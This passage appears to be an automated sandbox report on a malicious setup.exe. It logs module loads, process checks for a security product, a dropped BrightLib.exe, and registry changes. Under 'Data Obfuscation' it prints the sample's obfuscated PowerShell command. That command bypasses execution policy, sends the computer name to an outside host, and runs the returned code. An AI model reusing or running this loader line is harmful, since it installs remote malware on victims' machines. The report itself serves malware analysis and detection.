          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: winsta.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: rstrtmgr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: winsta.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: rstrtmgr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: sfc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: sfc_os.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: explorerframe.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: dlnashext.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: wpdshext.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
          Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
          Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
          Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
          Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
          Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
          Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: apphelp.dll
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: wsock32.dll
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: winmm.dll
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: version.dll
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: kernel.appcore.dll
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: uxtheme.dll
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: iconcodecservice.dll
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: windowscodecs.dll
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: textshaping.dll
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: windows.storage.dll
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: wldp.dll
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: winhttp.dll
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: twinui.dll
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: wintypes.dll
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: powrprof.dll
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: dwmapi.dll
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: pdh.dll
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: umpdc.dll
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: shdocvw.dll
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpWindow found: window name: TMainFormJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: setup.exeStatic file information: File size 2097152 > 1048576
          Source: setup.exeStatic PE information: Raw size of CODE is bigger than: 0x100000 < 0x127600
          Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb< source: powershell.exe, 00000004.00000002.2025410025.0000000007B00000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: BrightLib.exe, 00000025.00000002.2630130507.0000000038B80000.00000004.00000800.00020000.00000000.sdmp, BrightLib.exe, 00000025.00000002.2608357889.0000000003738000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: BrightLib.exe, 00000025.00000002.2630130507.0000000038B80000.00000004.00000800.00020000.00000000.sdmp, BrightLib.exe, 00000025.00000002.2608357889.0000000003738000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Suspicious powershell command line found
          Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?
          Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?Jump to behavior
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp.6.drStatic PE information: real checksum: 0x33908a should be: 0x33af29
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp.8.drStatic PE information: real checksum: 0x33908a should be: 0x33af29
          Source: setup.exeStatic PE information: real checksum: 0x285347 should be: 0x204747
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drStatic PE information: real checksum: 0x9307ce should be: 0x8615ed
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drStatic PE information: section name: .didata
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp.6.drStatic PE information: section name: .didata
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp.8.drStatic PE information: section name: .didata
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007F0CFD push eax; mov dword ptr [esp], 60636255h0_2_007F0D00
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007EDCBD push eax; mov dword ptr [esp], 0B08090Eh0_2_007EDCCB
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_03704900 push ds; retf 0007h4_2_037049B2
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_037044F7 push ss; retf 0007h4_2_03704502
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_037044C7 push ss; retf 0007h4_2_037044F2
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_03705B63 push edi; retf 0007h4_2_03705B7A
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_03705B43 push ebp; retf 0007h4_2_03705B4A
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_03705B4F push esi; retf 0007h4_2_03705B5A
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_03705B25 push ebp; retf 0007h4_2_03705B3A
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_03705A7F push eax; retf 0007h4_2_03705A8A
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_03705AFF push esp; retf 0007h4_2_03705B0A
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_03705ADF push ebx; retf 0007h4_2_03705AEA
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_03705ACF push ebx; retf 0007h4_2_03705ADA
